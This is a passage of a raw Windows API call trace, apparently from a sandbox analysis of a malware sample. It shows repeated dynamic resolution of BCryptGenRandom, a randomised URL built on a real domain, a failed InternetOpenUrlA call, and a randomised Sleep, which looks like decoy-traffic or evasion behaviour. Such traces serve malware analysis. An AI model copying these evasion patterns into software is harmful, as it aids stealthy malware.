pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0262.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01cd6, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a01cd6) returned 0x0 [0262.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.679] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.680] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.681] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.687] GetProcessHeap () returned 0x440000 [0262.687] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4724e0 [0262.687] lstrcpyA (in: lpString1=0x4724e0, lpString2="ö\x17E's://www.yahoo.com" | out: lpString1="ö\x17E's://www.yahoo.com") returned="ö\x17E's://www.yahoo.com" [0262.687] lstrcatA (in: lpString1="ö\x17E's://www.yahoo.com", lpString2="/pgw1fcsMaXpfQaPxftqpfcndwp3yp5bgrisiu/7mayf4aB0KimoZbiyr0egliqFK/9grjf7lq9bYOzrcfnQ9ng5wcvv924gl831xqq/gkYeqabbzw54tza4swG25thkTg1o1/k91ntkl6JpzdqgGNclzRsdhtq8peexdt0866EU5/" | out: lpString1="ö\x17E's://www.yahoo.com/pgw1fcsMaXpfQaPxftqpfcndwp3yp5bgrisiu/7mayf4aB0KimoZbiyr0egliqFK/9grjf7lq9bYOzrcfnQ9ng5wcvv924gl831xqq/gkYeqabbzw54tza4swG25thkTg1o1/k91ntkl6JpzdqgGNclzRsdhtq8peexdt0866EU5/") returned="ö\x17E's://www.yahoo.com/pgw1fcsMaXpfQaPxftqpfcndwp3yp5bgrisiu/7mayf4aB0KimoZbiyr0egliqFK/9grjf7lq9bYOzrcfnQ9ng5wcvv924gl831xqq/gkYeqabbzw54tza4swG25thkTg1o1/k91ntkl6JpzdqgGNclzRsdhtq8peexdt0866EU5/" [0262.688] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0262.688] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="ö\x17E's://www.yahoo.com/pgw1fcsMaXpfQaPxftqpfcndwp3yp5bgrisiu/7mayf4aB0KimoZbiyr0egliqFK/9grjf7lq9bYOzrcfnQ9ng5wcvv924gl831xqq/gkYeqabbzw54tza4swG25thkTg1o1/k91ntkl6JpzdqgGNclzRsdhtq8peexdt0866EU5/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0262.688] GetProcessHeap () returned 0x440000 [0262.688] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4724e0 | out: hHeap=0x440000) returned 1 [0262.688] GetProcessHeap () returned 0x440000 [0262.688] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a01c50 | out: hHeap=0x440000) returned 1 [0262.688] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0262.688] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0262.689] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0262.689] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0262.689] Sleep (dwMilliseconds=0x14bb5) [0262.855] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0262.855] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0262.856] GetProcessHeap () returned 0x440000 [0262.856] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02850 [0262.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0262.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02851, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x3a02851) returned 0x0 [0262.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.858] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.858] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0262.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02862, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a02862) returned 0x0 [0262.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.978] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.978] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.979] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.979] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.979] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.979] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.980] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.980] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.980] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.981] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.981] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0262.982] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.982] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0287a, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x3a0287a) returned 0x0 [0262.982] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.982] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.982] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.983] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.983] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.984] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.984] BCryptGenRandom (in: hAlgorithm=0x0, 